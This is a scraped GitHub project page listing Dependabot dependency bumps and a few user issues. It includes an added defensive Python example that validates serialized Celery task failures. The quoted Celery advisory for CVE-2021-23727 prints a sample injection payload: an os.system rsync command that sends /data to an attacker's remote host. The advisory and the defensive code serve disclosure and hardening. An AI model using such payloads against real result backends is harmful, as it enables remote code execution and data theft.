    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump sqlalchemy from 1.4.44 to 1.4.45

    Bump sqlalchemy from 1.4.44 to 1.4.45

    Bumps sqlalchemy from 1.4.44 to 1.4.45.

    Release notes

    Sourced from sqlalchemy's releases.

    1.4.45

    Released: December 10, 2022

    orm

    • [orm] [bug] Fixed bug where _orm.Session.merge() would fail to preserve the current loaded contents of relationship attributes that were indicated with the _orm.relationship.viewonly parameter, thus defeating strategies that use _orm.Session.merge() to pull fully loaded objects from caches and other similar techniques. In a related change, fixed issue where an object that contains a loaded relationship that was nonetheless configured as lazy='raise' on the mapping would fail when passed to _orm.Session.merge(); checks for "raise" are now suspended within the merge process assuming the _orm.Session.merge.load parameter remains at its default of True.

      Overall, this is a behavioral adjustment to a change introduced in the 1.4 series as of #4994, which took "merge" out of the set of cascades applied by default to "viewonly" relationships. As "viewonly" relationships aren't persisted under any circumstances, allowing their contents to transfer during "merge" does not impact the persistence behavior of the target object. This allows _orm.Session.merge() to correctly suit one of its use cases, that of adding objects to a Session that were loaded elsewhere, often for the purposes of restoring from a cache.

      References: #8862

    • [orm] [bug] Fixed issues in _orm.with_expression() where expressions that were composed of columns that were referenced from the enclosing SELECT would not render correct SQL in some contexts, in the case where the expression had a label name that matched the attribute which used _orm.query_expression(), even when _orm.query_expression() had no default expression. For the moment, if the _orm.query_expression() does have a default expression, that label name is still used for that default, and an additional label with the same name will continue to be ignored. Overall, this case is pretty thorny so further adjustments might be warranted.

      References: #8881

    engine

    • [engine] [bug] Fixed issue where _engine.Result.freeze() method would not work for textual SQL using either _sql.text() or _engine.Connection.exec_driver_sql().

      References: #8963

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 1
  • Bump certifi from 2022.9.24 to 2022.12.7

    Bump certifi from 2022.9.24 to 2022.12.7

    Bumps certifi from 2022.9.24 to 2022.12.7.

    dependencies python 
    opened by dependabot[bot] 1
  • Bump importlib-metadata from 4.13.0 to 5.1.0

    Bump importlib-metadata from 4.13.0 to 5.1.0

    Bumps importlib-metadata from 4.13.0 to 5.1.0.

    Changelog

    Sourced from importlib-metadata's changelog.

    v5.1.0

    • #415: Instrument SimplePath with generic support.

    v5.0.0

    • #97, #284, #300: Removed compatibility shims for deprecated entry point interfaces.
    dependencies python 
    opened by dependabot[bot] 1
  • Bump celery from 3.1.25 to 5.2.2

    Bump celery from 3.1.25 to 5.2.2

    Bumps celery from 3.1.25 to 5.2.2.

    Release notes

    Sourced from celery's releases.

    5.2.2

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    v5.2.1

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

    ... (truncated)

    Changelog

    Sourced from celery's changelog.

    5.2.2

    :release-date: 2021-12-26 16:30 P.M UTC+2:00
    :release-by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

        {
              "exc_module": "os",
              'exc_type': "system",
              "exc_message": "rsync /data [email protected]:~/data"
        }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

    5.2.1

    :release-date: 2021-11-16 8.55 P.M UTC+6:00
    :release-by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.

    ... (truncated)

    dependencies python 
    opened by dependabot[bot] 1
  • Bump bootstrap from 4.6.1 to 5.2.3 in /quantifiedcode/frontend

    Bump bootstrap from 4.6.1 to 5.2.3 in /quantifiedcode/frontend

    Bumps bootstrap from 4.6.1 to 5.2.3.

    Release notes

    Sourced from bootstrap's releases.

    v5.2.3

    Fixes

    🎨 CSS

    • #37377: Import root in bootstrap-utilities
    • #37425: Fix deprecation warning with sass 1.56.0
    • Carousel: Fix RTL translate() direction

    ☕️ JavaScript

    • #37235: fix tooltip/popper disposal inconsistencies

    v5.2.2

    Highlights

    • Accordion
      • Use Sass variable for the accordion color instead of an invalid CSS variable
    • Buttons
      • Undo changes to .btn:hover from v5.2.1. We now explicitly target .btn-check styles instead.
    • Dropdowns
      • Temporarily restore ability for dropdowns to work without an explicit data attribute (will be removed again in v6)
    • Modals
      • Improve modal event listeners
      • Use <h1> for all .modal-title instances in our docs
    • Tables
      • Don't redefine $border-color in table-variant() mixin
    • Tabs
      • Tabs no longer autofocus and cause pages to jump on tab.show()
      • Fix .active class toggling of tabs within dropdowns
    • Toasts
      • Properly set toast z-index on .toast-container as opposed to individual .toasts that don't receive any other positioning
    • Tooltips
      • Fix tooltip selectors with title attribute on dynamically created elements

    🎨 CSS

    • #37118: Set toast z-index variable in the correct spot
    • #37165: Explicitly target .btn-check and undo :hover
    • #37182: Use Sass variable for accordion color
    • #37239: Don't redefine $border-color in table-variant mixin

    ☕️ JavaScript

    • #36914: Fix tooltip selector usage
    • #37128: Fix modal event listeners
    • #37146: Drop tabs auto-focus
    • #37151: Fix active class toggling of tabs within dropdown
    • #37189: Enrich Tab Test for keyboard handler
    • #37190: Dropdown: fix case with invalid markup

    ... (truncated)

    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump loader-utils from 1.4.0 to 1.4.2 in /quantifiedcode/frontend

    Bump loader-utils from 1.4.0 to 1.4.2 in /quantifiedcode/frontend

    Bumps loader-utils from 1.4.0 to 1.4.2.

    Release notes

    Sourced from loader-utils's releases.

    v1.4.2

    1.4.2 (2022-11-11)

    Bug Fixes

    v1.4.1

    1.4.1 (2022-11-07)

    Bug Fixes

    Changelog

    Sourced from loader-utils's changelog.

    1.4.2 (2022-11-11)

    Bug Fixes

    1.4.1 (2022-11-07)

    Bug Fixes

    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump jquery from 3.6.1 to 3.6.3 in /quantifiedcode/frontend

    Bump jquery from 3.6.1 to 3.6.3 in /quantifiedcode/frontend

    Bumps jquery from 3.6.1 to 3.6.3.

    Release notes

    Sourced from jquery's releases.

    jQuery supports CSS.supports in jQuery 3.6.3

    https://blog.jquery.com/2022/12/20/jquery-3-6-3-released-a-quick-selector-fix/

    jQuery 3.6.2 :has arrived!

    https://blog.jquery.com/2022/12/13/jquery-3-6-2-released/

    Commits
    • 6786a17 3.6.3
    • 81d5bd1 Build: remove stale Insight package from custom builds
    • 8989500 Selector: Update Sizzle from 2.3.8 to 2.3.9
    • 2c5b47c Build: Updating the 3.x-stable version to 3.6.3-pre.
    • 2215119 Release: update authors
    • 0d9fae4 Build: Limit permissions for GitHub workflows
    • f4809f9 Build: Test on Node.js 18 & 19, stop testing on Node 12
    • 5318e31 Selector:Manipulation: Fix DOM manip within template contents
    • a1b7ae3 Selector: Update Sizzle from 2.3.7 to 2.3.8
    • 28241b7 Build: Bump actions/setup-node from 3.5.0 to 3.5.1
    • Additional commits viewable in compare view

    dependencies javascript 
    opened by dependabot[bot] 0
  • Bump importlib-metadata from 4.13.0 to 5.2.0

    Bump importlib-metadata from 4.13.0 to 5.2.0

    Bumps importlib-metadata from 4.13.0 to 5.2.0.

    Changelog

    Sourced from importlib-metadata's changelog.

    v5.2.0

    • #371: Deprecated expectation that PackageMetadata.__getitem__ will return None for missing keys. In the future, it will raise a KeyError.

    v5.1.0

    • #415: Instrument SimplePath with generic support.

    v5.0.0

    • #97, #284, #300: Removed compatibility shims for deprecated entry point interfaces.
    dependencies python 
    opened by dependabot[bot] 0
  • Bump flask from 2.0.3 to 2.2.2

    Bump flask from 2.0.3 to 2.2.2

    Bumps flask from 2.0.3 to 2.2.2.

    Release notes

    Sourced from flask's releases.

    2.2.2

    This is a fix release for the 2.2.0 feature release.

    2.2.1

    This is a fix release for the 2.2.0 feature release.

    2.2.0

    This is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as pip-tools to pin all dependencies and control upgrades.

    2.1.3

    2.1.2

    This is a fix release for the 2.1.0 feature release.

    2.1.1

    This is a fix release for the 2.1.0 feature release.

    2.1.0

    This is a feature release, which includes new features and removes previously deprecated features. The 2.1.x branch is now the supported bugfix branch, the 2.0.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as pip-tools to pin all dependencies and control upgrades.

    We also encourage upgrading to the latest versions of the other Pallets projects as well.

    Changelog

    Sourced from flask's changelog.

    Version 2.2.2

    Released 2022-08-08

    • Update Werkzeug dependency to >= 2.2.2. This includes fixes related to the new faster router, header parsing, and the development server. :pr:4754
    • Fix the default value for app.env to be "production". This attribute remains deprecated. :issue:4740

    Version 2.2.1

    Released 2022-08-03

    • Setting or accessing json_encoder or json_decoder raises a deprecation warning. :issue:4732

    Version 2.2.0

    Released 2022-08-01

    • Remove previously deprecated code. :pr:4667

      • Old names for some send_file parameters have been removed. download_name replaces attachment_filename, max_age replaces cache_timeout, and etag replaces add_etags. Additionally, path replaces filename in send_from_directory.
      • The RequestContext.g property returning AppContext.g is removed.
    • Update Werkzeug dependency to >= 2.2.

    • The app and request contexts are managed using Python context vars directly rather than Werkzeug's LocalStack. This should result in better performance and memory use. :pr:4682

      • Extension maintainers, be aware that _app_ctx_stack.top and _request_ctx_stack.top are deprecated. Store data on g instead using a unique prefix, like g._extension_name_attr.
    • The FLASK_ENV environment variable and app.env attribute are deprecated, removing the distinction between development and debug mode. Debug mode should be controlled directly using the --debug option or app.run(debug=True). :issue:4714

    ... (truncated)

    dependencies python 
    opened by dependabot[bot] 0
  • Ability to see percentage progress of scan

    Ability to see percentage progress of scan

    The web UI on http://localhost:5000 shows "Analysis in progress..." and a spinning symbol. Meanwhile the docker process started with start.sh is emitting hundreds of messages, although they seem to repeat a variation of themselves periodically. This is a relatively small project, although it has node_modules dependencies included in the repository, so this may make it seem like more. The PC running docker has plenty of RAM and cores. The point is, will it take 10 minutes, 10 hours or 10 days? I have no idea.

    opened by macsplit 2
  • CLI documentation for checkmate tool

    CLI documentation for checkmate tool

    I have no idea what commands are available for the checkmate tool, other than what I found in the sh scripts. Where are the commands and arguments documented? checkmate help returns:

    Unknown command: help

    opened by carlin-q-scott 3
  • Ability to configure issues at or after run time?

    Ability to configure issues at or after run time?

    I am testing this against a code base comprising >7k files (Java and JS mainly). The ensemble approach is great, but I have not been able to determine if it is possible to exclude issues from analysis and thereby speed up the overall analysis time.

    The UI seems to have this functionality, but 1) the filtering API/current database schema does not seem to support selection or exclusion of e.g., "readability" issues en masse (see my PR for a bug in this feature btw), and 2) manually deselecting via the on/off switch does not appear to affect scans currently in progress.

    Any advice on how I can exclude issues from consideration for a scan, either before or after the scan is started?

    opened by isclayton 1
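The CVE-2021-23727 note quoted in the celery 5.2.2 release notes and changelog above describes the missing check: a stored failure names an exception class by module and attribute, and re-raising whatever that lookup returns lets a non-exception callable run with attacker-chosen arguments. The following is an added example, not celery's own code: a hardened rebuild routine that re-imports the named class and refuses anything that is not an exception class, with an optional module allowlist. The payload keys follow the note; the function names and sample payloads are constructed for illustration.

```python
"""Hardened reconstruction of a serialized task failure (added example).

A result backend stores a failed task as a mapping with "exc_module",
"exc_type" and "exc_message".  The consumer re-imports exc_module, looks up
exc_type and re-raises it.  Without a type check, a tampered record can make
that lookup return an arbitrary function instead of an exception class.
This is an illustrative re-implementation of the described check, not
celery's code; all names below are assumptions.
"""
import importlib
from typing import Any, Dict, FrozenSet, Optional


class UnsafeFailurePayload(Exception):
    """Raised when a stored failure does not name a real exception class."""


def resolve_exception_class(
    exc_module: str,
    exc_type: str,
    allowed_modules: Optional[FrozenSet[str]] = None,
) -> type:
    """Return the exception class named by (exc_module, exc_type) or refuse."""
    # Optional defence in depth: only modules the application expects to
    # produce exceptions may be imported on behalf of backend data.
    if allowed_modules is not None and exc_module not in allowed_modules:
        raise UnsafeFailurePayload(f"module {exc_module!r} is not allowed")
    try:
        module = importlib.import_module(exc_module)
    except ImportError as err:
        raise UnsafeFailurePayload(f"cannot import {exc_module!r}") from err
    candidate: Any = getattr(module, exc_type, None)
    # The security-relevant check from the advisory: the looked-up object
    # must be a class AND an exception class.  A plain function such as
    # os.system fails the first test; a non-exception class such as
    # pathlib.Path fails the second.
    if not isinstance(candidate, type) or not issubclass(candidate, BaseException):
        raise UnsafeFailurePayload(
            f"{exc_module}.{exc_type} is not an exception class"
        )
    return candidate


def rebuild_failure(
    payload: Dict[str, Any],
    allowed_modules: Optional[FrozenSet[str]] = None,
) -> BaseException:
    """Instantiate (not raise) the exception described by a backend record."""
    cls = resolve_exception_class(
        str(payload["exc_module"]), str(payload["exc_type"]), allowed_modules
    )
    message = payload.get("exc_message", "")
    args = tuple(message) if isinstance(message, (list, tuple)) else (message,)
    return cls(*args)


def is_safe_failure(
    payload: Dict[str, Any],
    allowed_modules: Optional[FrozenSet[str]] = None,
) -> bool:
    """True if the record rebuilds into an exception without being rejected."""
    try:
        rebuild_failure(payload, allowed_modules)
    except (UnsafeFailurePayload, KeyError):
        return False
    return True


# Constructed sample records (not real backend data).
GENUINE_FAILURE = {
    "exc_module": "builtins",
    "exc_type": "ValueError",
    "exc_message": "bad input",
}
TAMPERED_FAILURE = {  # names a function, not an exception class
    "exc_module": "os",
    "exc_type": "system",
    "exc_message": "constructed-payload",
}
WRONG_CLASS_FAILURE = {  # a class, but not an exception class
    "exc_module": "pathlib",
    "exc_type": "Path",
    "exc_message": "/tmp",
}

if __name__ == "__main__":
    for label, record in [
        ("genuine", GENUINE_FAILURE),
        ("tampered", TAMPERED_FAILURE),
        ("wrong-class", WRONG_CLASS_FAILURE),
    ]:
        print(f"{label}: accepted={is_safe_failure(record)}")
```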
Releases(v0.9.9-alpha)
Owner
Marcin Kozlowski
IT
Marcin Kozlowski